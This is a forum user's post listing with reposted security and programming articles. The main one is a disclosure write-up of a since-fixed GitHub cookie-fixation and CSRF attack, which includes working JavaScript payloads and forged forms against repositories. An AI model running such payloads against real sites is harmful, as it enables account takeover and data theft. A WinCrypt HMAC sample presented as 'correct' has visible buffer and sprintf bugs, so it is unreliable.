Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. [h=3]Hacking Github with Webkit[/h]Personal: EgorHomakov.com, Consulting: Sakurity [h=2]Friday, March 8, 2013[/h]Previously on Github: XSS, CSRF (My github followers are real, I gained followers using CSRF on bitbucket), access bypass, mass assignments (2 Issues Reported forever), JSONP leaking, open redirect..... TL;DR: Github is vulnerable to cookie tossing. We can fixate _csrf_token value using a Webkit bug and then execute any authorized requests. Github Pages Plain HTML pages can served from yourhandle.github.com. These HTML pages may contain Javascript code. Wait. Custom JS on your subdomains is a bad idea: If you have document.domain='site.com' anywhere on the main domain, for example xd_receiver, then you can be easily XSSed from a subdomain Surprise, Javascript code can set cookies for the whole *.site.com zone, including the main website. [h=2]Webkit & cookies order[/h] Our browsers send cookies this way: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED; Please have in mind that Original _gh_sess and Dropped _gh_sess are two completely different cookies! They only share same name. Also there is no way to figure out which one is Domain=github.com and which is Domain=.github.com. Rack (a common interface for ruby web applications) uses the first one: cookies.each { |k,v| hash[k] = Array === v ? v.first : v } Here's another thing, Webkit (Chrome, Safari, and the new guy, Opera) sends cookies ordering them not by Domain (Domain=github.com must go first), and even not by httpOnly (they should go first obviously). It orders them by the creation time (I might be wrong here, but this is how it looks like). First of all let's have a look at the HACKED cookie. PROTIP — save it as decoder.rb and decode sessions faster: require'uri' require'base64' p Marshal.load(Base64.decode64(URI.decode(gets.split('--').first))) ruby decoder.rb BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b {:session_id=>"5a78a4fa3d808ba417e9cf29f255884d", :_csrf_token=>"ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="} on a subdomain we create _gh_sess=HACKED; Domain=.github.com window.open('https://github.com'). Browser sends: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED; Server responds: Set-Cookie:_gh_sess=ORIGINAL; httponly .... This made our HACKED cookie older then freshly received ORIGINAL cookie. Repeat request: window.open('https://github.com'). Browser sends: Cookie: _gh_sess=HACKED; _gh_sess=ORIGINAL; Server response: Set-Cookie:_gh_sess=HACKED; httponly .... Voila, we fixated it in Domain=github.com httponly cookie. Now both Domain=.github.com and Domain=github.com cookies have the same HACKED value. destroy the Dropped cookie, the mission is accomplished: document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT'; Initially I was able to break login (500 error for every attempt). I had some fun on twitter. Github staff banned my repo. Then I figured out how to fixate "session_id" and "_csrf_token" (they never get refreshed if already present) It will make you a guest user (logged out) but after logging in values will remain the same. [h=2]Steps:[/h] let's choose our target. We discussed XSS-privileges problem on twitter a few days ago. Any XSS on github can do anything: e.g. open source or delete a private repo. This is bad and Pagebox technique or Domain-splitting would fix this. We don't need XSS now since we fixated the CSRF token. (CSRF attack is almost as serious as XSS. Main profit of XSS - it can read responses. CSRF is write-only). So we would like to open source github/github, thus we need a guy who can technically do this. His name is the Githubber. I send an email to the Githubber. "Hey, check out new HTML5 puzzle! http://blabla.github.com/html5_game" the Githubber opens the game and it executes the following javascript — replaces his _gh_sess with HACKED (session fixation): document.cookie='_gh_sess=BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b;Domain=.github.com;'; x=window.open('https://github.com/'); setTimeout(function(){ x2=window.open('https://github.com/'); },3000); setTimeout(function(){ x.close() && x2.close(); document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT'; //_csrf_token is ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4= //insert <script src="/done.js"> every 1 second },10000); done=function(v){ if(v){ //make repo private again }else{ //keep trying to open source } } HACKED session is user_id-less (guest session). It simply contains session_id and _csrf_token, no certain user is specified there. So the Game asks him explictely: please Star us on github (or smth like this) <link>. He may feel confused (a little bit) to be logged out. Anyway, he logs in again. user_id in session belongs to the Githubber, but _csrf_token is still ours! Meanwhile, the Evil game inserts <script src=/done.js> every 1 second. It contains done(false) by default — it means, keep submitting the form to iframe : <form target=irf action="https://github.com/github/github/opensource" method="post"> <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=" </form> At the same time every 1 second I execute on my machine: git clone git://github.com/github/github.git As soon as the repo is opensourced my clone request will be accepted. Then I change /done.js: "done(true)". This will make Evil game to submit similar form and make github/github private again: <form target=irf action="https://github.com/github/github/privatesource" method="post"> <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=" </form> the Githubber replies: "Nice game" and doesn't notice anything (github/github was open sourced for a few seconds and I cloned it). Oh, his CSRF token is still ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4= Forever. (only cookies reset will update it) btw i don't like how cookies work Fast fix — now github expires Domain=.github.com cookie, if 2 _gh_sess cookies were sent on https://github.com/*. It kills HACKED just before it becomes older than ORIGINAL. Proper fix would be using githubpages.com or another separate domain. Blogger uses blogger.com as dashboard and blogspot.com for blogs. Last time I promised to publish an OAuth security insight This time I promise to write Webkit (in)security tips in a few weeks. There are some WontFix issues I don't like (related to privacy). P.S. I reported the fixation issue privately only because I'm a good guy and was in a good mood. Responsible disclosure is way more profitable with other websites, when I get a bounty and can afford at least a beer. Perhaps, tumblr has a similar issue. I didn't bother to check Posted by Egor Homakov at 8:33 PM Sursa: Egor Homakov: Hacking Github with Webkit
  2. Some dark corners of C O prezentare care trebuie vazuta de toti programatorii C: https://docs.google.com/presentation/d/1h49gY3TSiayLMXYmRMaAEMl05FaJ-Z6jDOWOz3EsqqQ/preview?usp=sharing&sle=true#slide=id.gaf50702c_0153
  3. Practical x64 Assembly and C++ Tutorials 10:48 1 de la WhatsACreel 1,127 de vizion?ri 9:19 2 Intro, briefly how to call x64 ASM from C++ de la WhatsACreel 14,821 de vizion?ri 11:33 3 Integer data types so we're all on the same page de la WhatsACreel 3,242 de vizion?ri 9:25 4 Intro to Registers, the 8086 de la WhatsACreel 3,180 de vizion?ri 7:59 5 This one is about the 386 and 486 register sets de la WhatsACreel 2,190 de vizion?ri 12:01 6 Finally we get to our modern x64 register set de la WhatsACreel 2,334 de vizion?ri 13:13 7 We'll look at a few useful instructions today. de la WhatsACreel 2,539 de vizion?ri 11:58 8 This one is about the important debugging windows in Visual Studio 2010 Express de la WhatsACreel 4,492 de vizion?ri 12:28 9 Today we'll look at Jumps, Labels and Comparing operands. de la WhatsACreel 2,077 de vizion?ri 11:41 10 This one is how to pass integer parameters via the registers and return them in RAX de la WhatsACreel 2,229 de vizion?ri 13:20 11 Some instructions for performing boolean logic de la WhatsACreel 1,835 de vizion?ri 14:39 12 Pointers, Memory and the Load Effective Address Instruction de la WhatsACreel 2,052 de vizion?ri 9:18 13 Planning prior to programming a small but useful algorithm to Zero an array de la WhatsACreel 1,913 vizion?ri 10:12 14 This is the programming of the algorithm we went through above de la WhatsACreel 1,993 de vizion?ri 11:56 15 Intro to reserving space in the data segment de la WhatsACreel 1,438 de vizion?ri 12:57 16 This one is about 4 shift instructions, SHL, SHR, SAL and SAR de la WhatsACreel 2,362 de vizion?ri 13:54 17 We'll look at the rather strange double precision shifts SHLD and SHRD de la WhatsACreel 1,140 de vizion?ri 13:31 18 Some rotate instructions, ROL, ROR, RCL and RCR de la WhatsACreel 1,528 de vizion?ri 20:32 19 The Multiplication and Division instructions de la WhatsACreel 1,885 de vizion?ri 19:04 20 Flags register and conditional moves and jumps de la WhatsACreel 1,724 de vizion?ri 16:50 21 Addressing modes from registers and immediates to SIB pointers. de la WhatsACreel 1,775 de vizion?ri 16:04 22 Intro to image processing de la WhatsACreel 1,821 de vizion?ri 19:43 23 This is the C++ image processing one de la WhatsACreel 2,455 de vizion?ri 23:41 24 This is C++ adjust brightness de la WhatsACreel 1,346 de vizion?ri 13:14 25 This is the Assembly version of the adjust brightness algorithm de la WhatsACreel 746 de vizion?ri 23:51 26 This is the Assembly version of the adjust brightness algorithm de la WhatsACreel 1,136 de vizion?ri 22:32 27 Introduction to the stack de la WhatsACreel 3,216 vizion?ri 17:42 28 Calling a C++ function from ASM de la WhatsACreel 1,498 de vizion?ri 31:39 29 Intro to the rather daunting stack frame de la WhatsACreel 2,416 vizion?ri 16:26 30 The test instruction is a AND but doesn't set the answer in op1 de la WhatsACreel 956 de vizion?ri 18:18 31 Testing single bits from a bit array de la WhatsACreel 893 de vizion?ri 14:47 32 Many little misc. instructions de la WhatsACreel 1,046 de vizion?ri 19:40 33 Three tutorials on the string instructions de la WhatsACreel 779 de vizion?ri 17:10 34 Three tutorials on the string instructions de la WhatsACreel 598 de vizion?ri 10:54 35 Three tutorials on the string instructions de la WhatsACreel 719 vizion?ri 17:04 36 This one is on the SETcc instructions which set bytes to 1 or 0 based on a condition de la WhatsACreel 505 vizion?ri 17:39 37 We will spend some time now looking at a few algorithms for practice, this one's FindMax(int*, int) de la WhatsACreel 538 de vizion?ri 21:26 38 This one is the Euclidean Algorithm de la WhatsACreel 710 vizion?ri 12:18 39 We've finally made it through most of the regular x86 instruction set, now for something completely different de la WhatsACreel 718 vizion?ri 24:11 40 Introducing the CPUID instruction de la WhatsACreel 1,315 vizion?ri 21:36 41 A general intro to MMX and a couple of the instructions de la WhatsACreel 801 vizion?ri 18:46 42 The addition and subtraction instructions in MMX de la WhatsACreel 691 de vizion?ri 17:51 43 Multiplcation instructions in MMX de la WhatsACreel 765 de vizion?ri 20:33 44 Bit shifting in MMX de la WhatsACreel 904 vizion?ri 20:32 45 de la WhatsACreel 543 de vizion?ri 20:15 46 de la WhatsACreel 590 de vizion?ri 21:23 47 de la WhatsACreel 569 de vizion?ri 13:28 48 de la WhatsACreel 741 de vizion?ri 19:45 49 de la WhatsACreel 911 vizion?ri 29:39 50 de la WhatsACreel 961 de vizion?ri 17:18 51 de la WhatsACreel 459 de vizion?ri 30:08 52 de la WhatsACreel 342 de vizion?ri 33:59 53 de la WhatsACreel 596 de vizion?ri 21:10 54 de la WhatsACreel 411 vizion?ri 12:40 55 de la WhatsACreel 239 de vizion?ri 12:32 Playlist: http://www.youtube.com/playlist?list=PL0C5C980A28FEE68D
  4. [h=1]Yes, your code does need comments.[/h] I imagine that this post is going to draw the ire of some. It seems like every time I mention this on Twitter or anywhere else there is always some pushback from people who think that putting comments in your code is a waste of time. I think your code needs comments, but so we have a mutual understanding, lets qualify that. def somefunction(a, : #add a to b c = a + b #return the result of a + b return c I understand this is a contrived example but this is the comment trap that new developers get caught in. These types of comments really aren't useful to anyone. Peppering the code that you just wrote with excessive comments, especially when it is abundantly clear what the code is doing, is the least useful type of comment you can write. "Code is far better describing what code does than English, so just write clear code" This is usually the blowback you get from comments like the ones above. I don't disagree, programming languages are definitely more precise than English. What I don't agree with is the idea that if the code is clear and understandable that comments are unneeded or don't have a place in modern software development. So knowing this, what kind of comments am I advocating for? I'm advocating for comments as documentation. Comments that explain what a complex piece of code does, and most importantly what an entire function or Class does and why they exist in the first place. So what is a good example of the kind of documentation I am talking about? I think Zed Shaw's Lamson is a fantastic example of this. Here is a code excerpt from that: class Relay(object): """ Used to talk to your "relay server" or smart host, this is probably the most important class in the handlers next to the lamson.routing.Router. It supports a few simple operations for sending mail, replying, and can log the protocol it uses to stderr if you set debug=1 on __init__. """ def __init__(self, host='127.0.0.1', port=25, username=None, password=None, ssl=False, starttls=False, debug=0): """ The hostname and port we're connecting to, and the debug level (default to 0). Optional username and password for smtp authentication. If ssl is True smtplib.SMTP_SSL will be used. If starttls is True (and ssl False), smtp connection will be put in TLS mode. It does the hard work of delivering messages to the relay host. """ self.hostname = host self.port = port self.debug = debug self.username = username self.password = password self.ssl = ssl self.starttls = starttls ... This code snippet is from https://github.com/zedshaw/lamson/blob/master/lamson/server.py. You can poke around the lamson code and see some good looking Python code but also some usefully documented code. [h=2]So hold on. Why are we writing comments?[/h] Why are we writing comments, if you write clean, understandable code? Why do we need to explain what classes and functions do if the code is "clear" and easy to understand. In my opinion, we write comments to capture intent. Comments are the only way to capture the intent of the code at the time of writing. Looking at a block of code only allows you to understand the intent of that particular code at that moment in time which may be very different then the intent of the code at time of its original writing. [h=2]Writing comments captures intent.[/h] Writing comments captures the original meaning of the code. Python has docstrings for this, other languages have comparable options. What is so good about docstring type comments? In conjunction with unambiguous class and function names they can easily describe the original intent of your code. Why is capturing the original intent of your code important? It allows a developer, at a glance, to look at a piece of code and know why it exists. It reduces situations where a piece of codes original intent isn't clear then gets modified and leads to unintended regressions. It reduces the amount of context a developer must hold his/her mind to solve any particular problem that may be contained in a piece of code. Writing comments to capture intent is like writing tests to prove that your software does what is expected. [h=2]Where do we go from here?[/h] The first step is to realize that the documentation/comments accompanying a piece of code can be just important as the code itself and need to be maintained as such. Just like code can become stale if you don't keep it updated so do comments. If you update some code you must update the accompanying comments/documentation or they become useless and can lead to more developer error then not having comments at all. So we have to treat comments and documentation as first class citizens. Next we have to agree on what is important to comment on in your code, and how to structure your code to make your use of comments most effective. Most of this relies on your own judgement but we can cover most issues with some steadfast rules. Never name your classes and functions ambiguously. Always use inline comments on code blocks that are complicated or may appear unclear. Always use descriptive variable names. Always write comments describing the intent or reason why a piece of code exists. Always keep comments up to date when editing commented code. As you can see from the points above code as documentation and comments as documentation are not mutually exclusive. Both are necessary to create readable code that is easily maintained by you and future maintainers. Sursa: Yes, your code does need comments. - Mike Grouchy
  5. BackTrack 5 Cookbook Over 80 recipes to execute many of the best known and little known penetration testing aspects of BackTrack 5 Willie Pritchett David De Smet Over 80 recipes to execute many of the best known and little known penetration testing aspects of BackTrack 5 - Learn to perform penetration tests with BackTrack 5 - Nearly 100 recipes designed to teach penetration testing principles and build knowledge of BackTrack 5 Tools - Provides detailed step-by-step instructions on the usage of many of BackTrack's popular and not-so- popular tools In Detail BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use. It is named after backtracking, a search algorithm. "BackTrack 5 Cookbook" provides you with practical recipes featuring many popular tools that cover the basics of a penetration test: information gathering, vulnerability identification, exploitation, priviledge escalation, and covering your tracks. The book begins by covering the installation of BackTrack 5 and setting up a virtual environment to perform your tests. We then dip into recipes involving the basic principles of a penetration test such as information gathering, vulnerability identification, and exploitation. You will further learn about privilege escalation, radio network analysis, Voice over IP, Password cracking, and BackTrack forensics. "BackTrack 5 Cookbook" will serve as an excellent source of information for the security professional and novice alike. What will you learn from this book: - Install and set up BackTrack 5 on multiple platforms - Customize BackTrack to fit your individual needs - Exploit vulnerabilities found with Metasploit - Locate vulnerabilities Nessus and OpenVAS - Provide several solutions to escalate privileges on a compromised machine - Learn how to use BackTrack in all phases of a penetration test - Crack WEP/WPA/WPA2 Encryption - Learn how to monitor and eavesdrop on VOIP networks Download: https://cdn.anonfiles.com/1358842982481.pdf Sursa: Data 4 Instruction: BackTrack 5 Cookbook
  6. Obfuscation: Malware’s best friend By Joshua Cannell March 8, 2013 In Malware Intelligence Here at Malwarebytes, we see a lot of malware. Whether it’s a botnet used to attack web servers or a ransomware stealing your files, much of today’s malware wants to stay hidden during infection and operation to prevent removal and analysis. Malware achieves this using many techniques to thwart detection and analysis—some examples of these include using obscure filenames, modifying file attributes, or operating under the pretense of legitimate programs and services. In more advanced cases, the malware might attempt to subvert modern detection software (i.e. MBAM) to prevent being found, hiding running processes and network connections. The possibilities are quite endless.Despite advances in modern malware, dirty programs can’t hide forever. When malware is found, it needs some additional layers of defense to protect itself from analysis and reverse engineering. By implementing additional protection mechanisms, malware can be more difficult to detect and even more resilient to takedown. Although a lot of tricks are used to hide malware’s internals, a technique used in nearly every malware is binary obfuscation.Obfuscation (in the context of software) is a technique that makes binary and textual data unreadable and/or hard to understand. Software developers sometimes employ obfuscation techniques because they don’t want their programs being reverse-engineered or pirated.Its implementation can be as simple as a few bit manipulations and advanced as cryptographic standards (i.e. DES, AES, etc). In the world of malware, it’s useful to hide significant words the program uses (called “strings”) because they give insight into the malware’s behavior. Examples of said strings would be malicious URLs or registry keys. Sometimes the malware goes a step further and obfuscates the entire file with a special program called a packer.Let’s see some practical obfuscation examples used in a lot of malware today. Scenario 1: The exclusive or operation (XOR) The exclusive or operation (represented as XOR) is probably the most commonly used method of obfuscation. This is because it is very easy to implement and easily hides your data from untrained eyes. Consider the following highlighted data. Obfuscated data is unreadable in its current form. In its current form, the data is unreadable. But when we apply an XOR value of 0×55, we see something else entirely. An XOR operation using 0×55 reveals a malicious URL. Now we have our malicious URL. Looks like this malware contacts “ http://tator1157.hostgator.com” to retrieve the file “bot.exe”.This form of obfuscation is typically very easy to defeat. Even if you don’t have the XOR key, programs exist to manually cycle through every possible single-byte XOR value in search of a particular string. One popular tool available on both UNIX and Window platforms is XORSearch written by Didier Stevens. This tool searches for strings encoded in multiple formats, including XOR.Because malware authors know programs like these exist, they implement tricks of their own to avoid detection. One thing they might do is a two-cycle approach, performing an XOR against data with a particular value and then making a second pass with another value. A separate technique (although equally effective) commonly used is to increment the XOR value in a loop. Using the previous example, we could XOR the letter ‘h’ with 0×55, then the letter ‘t’ with 0×56, and so on. This would also defeat common XOR detection programs.Scenario 2: Base64 encodingBase64 encoding has been used for a long time to transfer binary data (machine code) over a system that only handles text. As the name suggests, its encoding alphabet contains 64 characters, with the equal sign (=) used as a padding character. The alphabet contains the characters A-Z, a-z, 0-9, + and /. Below is an example of some encoded text representing the string pointing to the svchost.exe file, used by Windows to host services. Base64 is commonly used in malware to disguise text strings. While the encoded output is completely unreadable, base64 encoding is easier to identify than a lot of encoding schemes, usually because of its padding character. There are a lot of tools that can perform base64 encode/decode functions, both online and via downloaded programs.Because base64 encoding is so easy to overcome, malware authors usually take things a step further and change the order of the base64 alphabet, which breaks standard decoders. This allows for a custom encoding routine that is more difficult to break. Scenario 3: ROT13 Perhaps the most simple of the three techniques that’s commonly used is ROT13. ROT is an ASM instruction for “rotate”, hence ROT13 would mean “rotate 13”. ROT13 uses simple letter substitution to achieve obfuscated output.Let’s start by encoding the letter ‘a’. Since we’re rotating by thirteen, we count the next thirteen letters of the alphabet until we land at ‘n’. That’s really all there is to it! ROT13 uses a simple letter substitution to jumble text. The above image shows a popular registry key used to list programs that run each time a user logs in. ROT13 can also be modified to rotate a different number of characters, like ROT15. Scenario 4: Runtime packers In a lot of cases, the entire malware program is obfuscated. This prevents anybody from viewing the malware’s code until it is placed in memory.This type of obfuscation is achieved using what’s known as a packer program. A packer is piece of software that takes the original malware file and compresses it, thus making all the original code and data unreadable. At runtime, a wrapper program will take the packed program and decompress it in memory, revealing the program’s original code.Packers have been used for a long time for legitimate purposes, some of which include reducing file sizes and protecting against piracy. They help conceal vital program components and deter novice program crackers.Fortunately, we aren’t without help when it comes to identifying and unpacking these files. There are many programs available that detect commercial packers, and also advise on how to unpack. Some examples of these file scanners are Exeinfo PE and PEID (no longer developed, but still available for download). Exeinfo PE is a great tool for detecting common packers. However, as you might expect, the situation can get more complicated. Malware authors like to create custom packers to prevent less-experienced reverse engineers from unpacking their malware’s contents. This approach defeats modern unpacking scripts, and forces reversers to manually unpack the file and see what the program is doing. Even rarer, sometimes malware authors will twice-pack their files, first with a commercial packer and then their own custom packer. Conclusion While this list of techniques is certainly not exhaustive, hopefully this has provided a better understanding of how malware hides itself from plain sight. Obfuscation is a highly reliable technique that’s used to hide file contents, and sometimes the entire file itself if using a packer program.Obfuscation techniques are always changing, but rest assured knowing we at Malwarebytes are well-aware of this. Our staff has years of experience in fighting malware, and goes to great lengths to see what malicious files are really doing.Bring it on, malware. Do your worst! Sursa: Obfuscation: Malware’s best friend | Malwarebytes Unpacked
  7. Nytro

    Hmac md5/sha1

    [h=1]HMAC MD5/SHA1[/h] Author: [h=3]RosDevil[/h]Hi people, this is a correct usuage of windows' WINCRYPT Apis to peform HMAC MD5/SHA1 The examples shown on msdn aren't correct and have some bugs, so i decided to share a correct example. #include <iostream> #include "windows.h" #include <wincrypt.h> #ifndef CALG_HMAC #define CALG_HMAC (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HMAC) #endif #ifndef CRYPT_IPSEC_HMAC_KEY #define CRYPT_IPSEC_HMAC_KEY 0x00000100 #endif #pragma comment(lib, "crypt32.lib") using namespace std; char * HMAC(char * str, char * password, DWORD AlgId); typedef struct _my_blob{ BLOBHEADER header; DWORD len; BYTE key[0]; }my_blob; int main(int argc, _TCHAR* argv[]) { char * hash_sha1 = HMAC("ROSDEVIL", "password", CALG_SHA1); char * hash_md5 = HMAC("ROSDEVIL", "password", CALG_MD5); cout<<"Hash HMAC-SHA1: "<<hash_sha1<<" ( "<<strlen(hash_sha1)<<" )"<<endl; cout<<"Hash HMAC-MD5: "<<hash_md5<<" ( "<<strlen(hash_md5)<<" )"<<endl; cin.get(); return 0; } char * HMAC(char * str, char * password, DWORD AlgId = CALG_MD5){ HCRYPTPROV hProv = 0; HCRYPTHASH hHash = 0; HCRYPTKEY hKey = 0; HCRYPTHASH hHmacHash = 0; BYTE * pbHash = 0; DWORD dwDataLen = 0; HMAC_INFO HmacInfo; int err = 0; ZeroMemory(&HmacInfo, sizeof(HmacInfo)); if (AlgId == CALG_MD5){ HmacInfo.HashAlgid = CALG_MD5; pbHash = new BYTE[16]; dwDataLen = 16; }else if(AlgId == CALG_SHA1){ HmacInfo.HashAlgid = CALG_SHA1; pbHash = new BYTE[20]; dwDataLen = 20; }else{ return 0; } ZeroMemory(pbHash, sizeof(dwDataLen)); char * res = new char[dwDataLen * 2]; my_blob * kb = NULL; DWORD kbSize = sizeof(my_blob) + strlen(password); kb = (my_blob*)malloc(kbSize); kb->header.bType = PLAINTEXTKEYBLOB; kb->header.bVersion = CUR_BLOB_VERSION; kb->header.reserved = 0; kb->header.aiKeyAlg = CALG_RC2; memcpy(&kb->key, password, strlen(password)); kb->len = strlen(password); if (!CryptAcquireContext(&hProv, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL,CRYPT_VERIFYCONTEXT | CRYPT_NEWKEYSET)){ err = 1; goto Exit; } if (!CryptImportKey(hProv, (BYTE*)kb, kbSize, 0, CRYPT_IPSEC_HMAC_KEY, &hKey)){ err = 1; goto Exit; } if (!CryptCreateHash(hProv, CALG_HMAC, hKey, 0, &hHmacHash)){ err = 1; goto Exit; } if (!CryptSetHashParam(hHmacHash, HP_HMAC_INFO, (BYTE*)&HmacInfo, 0)){ err = 1; goto Exit; } if (!CryptHashData(hHmacHash, (BYTE*)str, strlen(str), 0)){ err = 1; goto Exit; } if (!CryptGetHashParam(hHmacHash, HP_HASHVAL, pbHash, &dwDataLen, 0)){ err = 1; goto Exit; } ZeroMemory(res, dwDataLen * 2); char * temp; temp = new char[3]; ZeroMemory(temp, 3); for (unsigned int m = 0; m < dwDataLen; m++){ sprintf(temp, "%2x", pbHash[m]); if (temp [1] == ' ') temp [1] = '0'; // note these two: they are two CORRECTIONS to the conversion in HEX, sometimes the Zeros are if (temp [0] == ' ') temp [0] = '0'; // printed with a space, so we replace spaces with zeros; (this error occurs mainly in HMAC-SHA1) sprintf(res,"%s%s", res,temp); } delete [] temp; Exit: free(kb); if(hHmacHash) CryptDestroyHash(hHmacHash); if(hKey) CryptDestroyKey(hKey); if(hHash) CryptDestroyHash(hHash); if(hProv) CryptReleaseContext(hProv, 0); if (err == 1){ delete [] res; return ""; } return res; } //Note: using HMAC-MD5 you could perform the famous CRAM-MD5 used to authenticate //smtp servers. Sursa: HMAC MD5/SHA1 - rohitab.com - Forums
  8. [h=2]lundi 25 février 2013, 17:26:37 (UTC+0100)[/h] [h=3]Mutation-based fuzzing of XSLT engines[/h] Intro I did in 2011 some research about vulnerabilities caused by the abuse of dangerous features provided by XSLT engines. This leads to a few vulnerabilities (mainly access to the file system or code execution) in Webkit, xmlsec, SharePoint, Liferay, MoinMoin, PostgreSQL, ... In 2012, I decided to look for memory corruption bugs and did some mutation-based (aka "dumb") fuzzing of XSLT engines. This article presents more than 10 different PoC affecting Firefox, Adobe Reader, Chrome, Internet Explorer and Intel SOA. Most of these bugs have been patched by their respective vendors. The goal of this blog-post is mainly to show to XML newbies what pathological XSLT looks like. Of course, exploit writers could find some useful information too. When fuzzing XSLT engines by providing malformed XSLT stylesheets, three distinct components (at least) are tested: - the XML parser itself, as a XSLT stylesheet is a XML document - the XSLT interpreter, which need to compile and execute the provided code - the XPath engine, because attributes like "match" and "select" use it to reference data Given that dumb fuzzing is used, the generation of test cases is quite simple. Radamsa generates packs of 100 stylesheets from a pool of 7000 grabbed here and there. A much improved version (using among others grammar-based generation) is on the way and already gives promising results ;-) PoC were minimized manually, given that the template structure and execution flow of XSLT doesn't work well with minimizers like tmin or delta. Intel SOA Expressway XSLT 2.0 Processor Intel was proposing an evaluation version of their XSLT 2.0 engine. It's quite rare to encounter a C-based XSLT engine supporting version 2.0, so it was added to the testbed even if it has minor real-world relevance. In my opinion, the first bug should have been detected during functionnal testing. When idiv (available in XPath 2.0) is used with 1 as the denominator, a optimization/shortcut is used. But it seems that someone has confused the address and the value of the corresponding numerator variable. Please note that the value of the numerator corresponds to 0x41424344 in hex. Articol: http://www.agarri.fr/blog/index.html
  9. Cateva idei: https://docs.google.com/file/d/0B46UFFNOX3K7bl8zWmFvRGVlamM/view?pli=1&sle=true
  10. E de cacat. Linux, Android, iOS, MAC OS X Firefox OS, Chrome OS te pun sa selectezi browseru? Eu poate vreau Internet Explorer p Linux, cu Wine, vreau sa ma puna sa aleg!
  11. Nu isi merita banii, nimic special...
  12. La cat de complicate sunt lucrurile si banii sunt pe masura. Conteaza insa si cum colaboreaza companiile. CEO-ul de la VUPEN (cei mai smecheri in domeniul "exploit development" dupa parerea mea) a declarat ca Microsoft nu mai vrea sa le cumpere 0day-urile (cel din IE10 pe Win8) si in concluzie acestea vor ajunge la guverne. Ceea cea nu e deloc ok.
  13. [h=1]Major Browsers, Java Hacked on the First Day of Pwn2Own 2013[/h]March 7th, 2013, 14:04 GMT · By Eduard Kovacs Considering the large amounts of money being offered at Pwn2Own 2013, we shouldn’t be surprised that most of the web browsers have been hacked on the first day of the competition, held these days in Canada as part of the CanSecWest conference. So far, Firefox, Internet Explorer 10, Java and Chrome have been broken by the contestants. French security firm VUPEN announced breaking Internet Explorer 10 on Windows 8, Firefox 19 on Windows 7, and Java. “We've pwned MS Surface Pro with two IE10 zero-days to achieve a full Windows 8 compromise with sandbox bypass,” VUPEN wrote on Twitter. “We've pwned Firefox using a use-after-free and a brand new technique to bypass ASLR/DEP on Win7 without the need of any ROP,” the company said two hours later. It appears they hacked Java by leveraging a “unique heap overflow as a memory leak to bypass ASLR and as a code execution.” “ALL our 0days & techniques used at #Pwn2own have been reported to affected software vendors to allow them issue patches and protect users,” VUPEN said. Experts from MWR Labs have managed to demonstrate a full sandbox bypass exploit against the latest stable version of Chrome. “By visiting a malicious webpage, it was possible to exploit a vulnerability which allowed us to gain code execution in the context of the sandboxed renderer process,” MWR Labs representatives wrote. “We also used a kernel vulnerability in the underlying operating system in order to gain elevated privileges and to execute arbitrary commands outside of the sandbox with system privileges.” Java was also “pwned” by Josh Drake of Accuvant Labs and James Forshaw of Contextis. Currently, VUPEN is working on breaking Flash, Pham Toan is attempting to hack Internet Explorer 10, and the famous George Hotz is taking a crack at Adobe Reader. Sursa: Major Browsers, Java Hacked on the First Day of Pwn2Own 2013 - Softpedia
  14. [h=2]Evolution of Process Environment Block (PEB)[/h]March 2, 2013 / ReWolf Over one year ago I’ve published unified definition of PEB for x86 and x64 Windows (PEB32 and PEB64 in one definition). It was based on PEB taken from Windows 7 NTDLL symbols, but I was pretty confident that it should work on other versions of Windows as well. Recently someone left a comment under mentioned post: “Good, but its only for Windows 7?. It made me curious if it is really ‘only for Win7?. I was expecting that there might be some small differences between some field names, or maybe some new fields added at the end, but the overall structure should be the same. I’ve no other choice but to check it myself. I’ve collected 108 different ntdll.pdb/wntdll.pdb files from various versions of Windows and dumped _PEB structure from them (Dia2Dump ftw!). Here are some statistics: _PEB was defined in 80 different PDBs (53 x86 PEBs and 27 x64 PEBs) There was 11 unique PEBs for x86, and 8 unique PEBs for x64 (those numbers doesn’t sum up, as starting from Windows 2003 SP1 there is always match between x86 and x64 version) The total number of collected different _PEB definitions is equal to 11 I’ve put all the collected informations into nice table (click the picture to open PDF): PEB Evolution PDF Left column of the table represents x86 offset, right column is x64 offset, green fields are supposed to be compatible across all windows versions starting from XP without any SP and ending at Windows 8 RTM, red (pink?, rose?) fields should be used only after careful verification if they’re working on a target system. At the top of the table, there is row called NTDLL TimeStamp, it is not timestamp from the PE header but from Debug Directory (IMAGE_DIRECTORY_ENTRY_DEBUG, LordPE can parse this structure). I’m using this timestamp as an unique identifier for NTDLL version, this timestamp is also stored in PDB files. Now I can answer initial question: “Is my previous PEB32/PEB64 definition wrong ?” Yes and No. Yes, because it contains various fields specific for Windows 7 thus it can be considered as wrong. No, because most of fields are exactly the same across all Windows versions, especially those fields that are usually used in third party software. To satisfy everyone, I’ve prepared another version of PEB32/PEB64 definition: #pragma pack(push) 